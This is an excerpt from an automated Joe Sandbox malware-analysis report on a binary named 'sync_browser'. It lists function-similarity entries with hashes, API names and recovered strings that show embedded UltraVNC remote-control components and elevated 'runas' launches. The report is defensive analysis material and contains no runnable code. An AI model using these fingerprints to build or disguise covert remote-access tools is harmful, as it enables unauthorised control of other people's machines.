                                                                    Similarity
                                                                    • API ID: Thread$Desktop$CurrentInformationObjectUser
                                                                    • String ID: vncservice.cpp : !GetUserObjectInformation $vncservice.cpp : SelectHDESK to %s (%x) from %x$vncservice.cpp : SelectHDESK:!SetThreadDesktop
                                                                    • API String ID: 3041254040-2700308907
                                                                    • Opcode ID: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
                                                                    • Instruction ID: 1c1737eb8e9ac4a2232560b8b3d09b57ccdeff40bc7108dcbb9b830c64733692
                                                                    • Opcode Fuzzy Hash: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
                                                                    • Instruction Fuzzy Hash: DC21F975A0CA82C1EA61BB61B8483FAB3A5FF89744FC40432D58E46769DE7CF155CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                                    • String ID: -delsoftwarecad$p$runas
                                                                    • API String ID: 397093096-3343046257
                                                                    • Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                                    • Instruction ID: ce4a99fe826d93f562eff00930ff27bba5964ee1ad091798ebc7833e32dfe068
                                                                    • Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                                    • Instruction Fuzzy Hash: 5111A83551CB81C5E770AB50F49939AB7A4FB88745F800235E68D02B69DF7DE158CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                                    • String ID: -softwarecad$p$runas
                                                                    • API String ID: 397093096-2208381721
                                                                    • Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                    • Instruction ID: 725d8d255b90e7137603558d9fa2fd8cec7f4fe8d5399a3f28c82e17d07243bb
                                                                    • Opcode Fuzzy Hash: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                    • Instruction Fuzzy Hash: 4311A83551CB81C5E770AB50F49939AB7A4FB88745F800235D68D02B69DF7DE158CB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleValueWait
                                                                    • String ID:
                                                                    • API String ID: 3883107862-0
                                                                    • Opcode ID: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
                                                                    • Instruction ID: 76e165f88c7e568ca84d08f30fa52797bf8c57f6eed34f32a2647bf05cfde130
                                                                    • Opcode Fuzzy Hash: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
                                                                    • Instruction Fuzzy Hash: 9D311636A1CB46C2EB10BF20E4443A9B3A4FB88B94F844131DA9D43769CF3CE599C720
                                                                    APIs
                                                                      • Part of subcall function 00007FF7400C37C4: GetLastError.KERNEL32(?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400C37CE
                                                                      • Part of subcall function 00007FF7400C37C4: FlsGetValue.KERNEL32(?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400C37DC
                                                                      • Part of subcall function 00007FF7400C37C4: FlsSetValue.KERNEL32(?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400C3808
                                                                      • Part of subcall function 00007FF7400C37C4: GetCurrentThreadId.KERNEL32 ref: 00007FF7400C381C
                                                                      • Part of subcall function 00007FF7400C37C4: SetLastError.KERNEL32(?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400C3834
                                                                      • Part of subcall function 00007FF7400C32EC: Sleep.KERNEL32(?,?,?,00007FF7400C37F7,?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19), ref: 00007FF7400C3331
                                                                    • _errno.LIBCMT ref: 00007FF7400C9D9C
                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C9DA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
                                                                    • String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
                                                                    • API String ID: 1962487656-880385205
                                                                    • Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                    • Instruction ID: 5114fae920286c120a1b074a2beee3788c827b088232230df5acafb639c5f60a
                                                                    • Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                    • Instruction Fuzzy Hash: A691F73360C181CBEB0DAE38D4987A8BBA1D761704F49C135DA498B7AADF39F509C761
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
                                                                    • String ID: 0123456789.
                                                                    • API String ID: 1515065793-2088042752
                                                                    • Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                                    • Instruction ID: f18db247834ac0ed752afc1c86fbc85b4522780bb850b646180f7a9be36155c2
                                                                    • Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                                    • Instruction Fuzzy Hash: EA414461A1D682C6EB74BF21A8046F9A261FF48BA5F844231DD1E477EDEE3CF5448321
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$InitializeLeave$EnterExceptionRaisemalloc
                                                                    • String ID: P$vncclient.cpp : init update thread
                                                                    • API String ID: 1414418286-2218817233
                                                                    • Opcode ID: ddfed08e363cca9923913227180b1ae3d8e90c93c992078c94d7733d39bccdf3
                                                                    • Instruction ID: c78879341de626f1350b0b9d2c01b5ab6443716373ba235faa837e9f294d158d
                                                                    • Opcode Fuzzy Hash: ddfed08e363cca9923913227180b1ae3d8e90c93c992078c94d7733d39bccdf3
                                                                    • Instruction Fuzzy Hash: B941273261DB81C6E658AF61E4443ADB3A0FB48B90F844135DB9E47BA8DF3CF4688710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CloseDeleteEnterFileHandleLeave
                                                                    • String ID: !UVNCDIR-$f
                                                                    • API String ID: 753559762-4271271459
                                                                    • Opcode ID: 29944916d6d12298b1d8fc6fc50fe8c47ba2ebb8248a2f4b8993eced494bf57f
                                                                    • Instruction ID: 64ba6d8f56ef4c6a46f1807f6cd08d8cb69fda31d9b87d4d9f0c0e12623a9bf6
                                                                    • Opcode Fuzzy Hash: 29944916d6d12298b1d8fc6fc50fe8c47ba2ebb8248a2f4b8993eced494bf57f
                                                                    • Instruction Fuzzy Hash: 8E418221A0CA81C1EB50BF25E8543B967A0EF85BA4F940335DA6D4B7E9DF3CE4448721
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: freeinet_addrmalloc
                                                                    • String ID: 0123456789.$both$local$remote
                                                                    • API String ID: 2387382576-3366603569
                                                                    • Opcode ID: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
                                                                    • Instruction ID: faba5c2fdfe780d4760eca1a99ba7da1ebdb2954cc4c1ddf86fae63c53f52b8d
                                                                    • Opcode Fuzzy Hash: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
                                                                    • Instruction Fuzzy Hash: C7219621A0C685C5F710BB11A910374B791FB497D0FD84131DA5E577EDDE6CF5818320
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __doserrno_errno
                                                                    • String ID:
                                                                    • API String ID: 921712934-0
                                                                    • Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                    • Instruction ID: 55ada54f8d6b5d4ddfcbc8fc013ead817f7fce249d2c9d44ccc902e9268d548c
                                                                    • Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                    • Instruction Fuzzy Hash: A321CC22A1C642C6E2157BA4A84177DF630AF81761FC90236EA1C073FADE7CB841CB30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileModuleNameShellfclose
                                                                    • String ID: \uvnckeyboardhelper.exe$p$runas
                                                                    • API String ID: 3322125093-2954907143
                                                                    • Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                    • Instruction ID: d14ff2b7a4d239374215dc05bf7452e3c3f9abc3c4edd8f817b723d0da69b86f
                                                                    • Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                    • Instruction Fuzzy Hash: 7831FC3660CB82C5EB64BB51F4513AAB3A4FB88754F804136DAAD43BA9DF3CE114CB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Timer$KillMessageModePostQuitWindow
                                                                    • String ID: d
                                                                    • API String ID: 3664928928-2564639436
                                                                    • Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                    • Instruction ID: 5109d452caa032073c9bfcc2f9461892123e9ef2ba2495867ecd4895789442e8
                                                                    • Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                    • Instruction Fuzzy Hash: 0E119EA2E1C643C2F7617B35B914675A290AF443A5F884230C92A867F8DF3CF981CA30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: SHGetSettings$shell32.dll
                                                                    • API String ID: 145871493-1819508790
                                                                    • Opcode ID: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
                                                                    • Instruction ID: f5afa1cdd1ea3194647edca93fb51f98a117478bd5ed8d3655de59bcec921caf
                                                                    • Opcode Fuzzy Hash: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
                                                                    • Instruction Fuzzy Hash: 13118C21B1D742C2EE50BB65B48817993A0EF8AB80FC81035EA6E43769DE2CF481C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AsyncState$Virtual
                                                                    • String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
                                                                    • API String ID: 2891131044-1915745809
